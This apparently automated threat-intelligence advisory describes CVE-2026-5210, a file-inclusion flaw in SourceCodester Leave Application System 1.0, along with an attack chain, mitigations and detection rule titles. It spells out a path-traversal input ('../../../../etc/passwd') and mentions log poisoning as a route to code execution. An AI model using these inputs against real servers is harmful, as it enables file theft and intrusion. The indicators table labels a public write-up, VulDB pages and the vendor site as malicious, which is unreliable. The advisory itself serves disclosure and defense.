SourceCodester Leave Application System 1.0 File Inclusion Vulnerability (CVE-2026-5210)
SourceCodester Leave Application System 1.0 is vulnerable to remote file inclusion (CVE-2026-5210) due to improper handling of the 'page' argument, potentially allowing attackers to execute arbitrary code.
SourceCodester Leave Application System version 1.0 is vulnerable to a file inclusion vulnerability (CVE-2026-5210). This vulnerability allows a remote attacker to include arbitrary files on the server by manipulating the page argument in a request. The vulnerability exists because the application fails to properly sanitize user-supplied input, leading to the inclusion of potentially malicious files. Public exploits are available, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations using the affected application, as it can lead to remote code execution and data exfiltration.
Attack Chain
- The attacker identifies a page within the SourceCodester Leave Application System 1.0 that uses the
pageparameter to include files. - The attacker crafts a malicious URL containing the
pageparameter, injecting a path to a local file (e.g.,../../../../etc/passwd) or a remote file via a URL. - The vulnerable application processes the attacker-supplied
pageparameter without proper sanitization or validation. - The application attempts to include the file specified by the attacker’s malicious URL.
- If the file is successfully included, the attacker can read sensitive information (e.g.,
/etc/passwd, database configuration files). - If the attacker can include a PHP file (e.g., via a log poisoning attack), they can achieve remote code execution on the server.
- The attacker executes arbitrary commands on the server with the privileges of the web server user.
- The attacker can then pivot to other systems, install malware, or exfiltrate sensitive data.
Impact
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, and user credentials. Remote code execution is possible if the attacker can include a PHP file, potentially leading to complete system compromise. This could impact all users of the Leave Application System, potentially exposing employee data.
Recommendation
- Apply available patches or upgrade to a secure version of SourceCodester Leave Application System to remediate CVE-2026-5210.
- Deploy the provided Sigma rule to detect attempts to exploit the file inclusion vulnerability by monitoring for suspicious
pageparameter values in web server logs. - Implement strict input validation and sanitization for all user-supplied input, especially parameters used for file inclusion.
- Restrict file system access for the web server user to only the necessary directories to prevent unauthorized file access.
- Monitor web server logs for access to sensitive files, such as
/etc/passwd, database configuration files, and application source code. - Block the reported malicious URL
https://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40at the network perimeter.
Detection coverage 2
Detect LFI Attempts via Page Parameter
highDetects attempts to exploit LFI vulnerabilities by analyzing the 'page' parameter in HTTP requests.
Detect access to sensitive files via web server
mediumDetects access to common sensitive files via web requests that may indicate LFI or other vulnerability
Detection queries are kept inside the platform. Get full rules →
Indicators of compromise
1
5
url
| Type | Value |
|---|---|
| url | https://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40 |
| url | https://vuldb.com/submit/780419 |
| url | https://vuldb.com/vuln/354346 |
| url | https://vuldb.com/vuln/354346/cti |
| url | https://www.sourcecodester.com/ |
| [email protected] |